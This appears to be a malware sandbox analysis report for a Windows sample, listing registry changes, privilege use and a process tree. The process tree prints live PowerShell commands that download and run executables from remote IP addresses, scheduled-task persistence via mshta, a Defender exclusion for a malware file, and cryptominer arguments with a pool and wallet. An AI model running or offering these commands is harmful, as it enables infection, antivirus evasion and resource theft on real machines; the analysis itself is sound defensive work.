| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{2984A9DB-5689-43AD-877D-14999A15DD46}" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Discrete;Continuous" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR de-DE Lookup Lexicon" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "409;9" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\AI043082" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\AI041036" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "L1031" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{15E16AEC-F2F0-4E52-B0DF-029D11E58E4B}" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Vous avez sélectionné %1 comme voix par défaut." | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Julie" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\it-IT\\M1040Elsa" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\ja-JP\\M1041Ayumi" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - Japanese (Japan)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "14388" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe
"C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn JecbLmaitu6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\U44e8nmtz.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\U44e8nmtz.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn JecbLmaitu6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\U44e8nmtz.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE
"C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\76D.tmp\77E.tmp\77F.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\0389b600fa.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\0389b600fa.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn gEyPMmadXw2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\bnjQfCSgl.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\bnjQfCSgl.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn gEyPMmadXw2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\bnjQfCSgl.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE
"C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "rQEBVmaAVTd" /tr "mshta \"C:\Temp\1yURt7eZP.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\1yURt7eZP.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3hq2ldxe\3hq2ldxe.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES58C9.tmp" "c:\Users\Admin\AppData\Local\Temp\3hq2ldxe\CSCDDFC2C1F12EC4E808A2A10CED6C631B7.TMP"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5EA5.tmp\5EA6.tmp\5EA7.bat C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\ProgramData\ogatq\ckhhtd.exe
C:\ProgramData\ogatq\ckhhtd.exe
C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe"
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4164 -ip 4164
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 788
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z2xbmh2o\z2xbmh2o.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C3D.tmp" "c:\Users\Admin\AppData\Local\Temp\z2xbmh2o\CSC75D50354595B4C09B739CA329351D8DB.TMP"
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5700 -ip 5700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 788
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\8SgVdVfj\Anubis.exe""
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_5848_133856936207227123\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
